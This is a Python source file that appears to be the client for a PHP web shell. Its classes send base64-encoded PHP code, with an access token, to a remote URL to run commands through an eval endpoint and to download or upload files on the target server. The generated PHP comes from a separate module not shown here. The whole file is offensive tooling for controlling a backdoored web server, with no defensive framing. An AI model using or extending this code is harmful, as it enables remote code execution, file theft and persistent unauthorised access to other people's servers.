#!/usr/bin/env python

import base64
import sys
import phpcode

from configparse import *
from url import *

class php_eval:
	def __init__(self, config, opener):
		self.url          = config[hostvar][urlvar]
		self.token        = config[hostvar][tokenvar]
		self.opener       = opener
		self.codegen      = phpcode.codegen()
		self.tokenvarname = config[hostvar][tokenvarname]
		self.datavarname  = config[hostvar][datavarname]
		self.filevarname  = config[hostvar][filevarname]

	def eval(self, data):
		postdata = {self.tokenvarname:self.token,
		            self.datavarname:base64.b64encode(data)}
		return self.opener.open(self.url, postdata)

class shell_eval(php_eval):
	def __init__(self, config, opener, readbuf = 2**24):
		self.readbuf = readbuf
		php_eval.__init__(self, config, opener)

	def eval(self, data):
		data = self.codegen.code(phpcode.EVAL_CODE, data, self.readbuf)
		return php_eval.eval(self, data)

class download_eval(php_eval):
	def __init__(self, config, opener):
		php_eval.__init__(self, config, opener)

	def eval(self, remote_file, local_file):
		postdata = {
					self.tokenvarname : self.token,
					self.datavarname  : base64.b64encode(self.codegen.code(phpcode.DOWNLOAD_CODE, remote_file, remote_file))
				   }
		self.opener.download(self.url, postdata, local_file)

class upload_eval(php_eval):
	def __init__(self, config, opener):
		php_eval.__init__(self, config, opener)

	def eval(self, remote_file, local_file):
		postdata = {
					self.tokenvarname:self.token,
					self.datavarname:base64.b64encode(self.codegen.code(phpcode.UPLOAD_CODE, self.filevarname, remote_file)),
					self.filevarname: open(local_file,"r")
				   }
		self.opener.upload(self.url, postdata)

def create_evaluator(evaluator, config):
	return evaluator(config, urlopener(config))
	
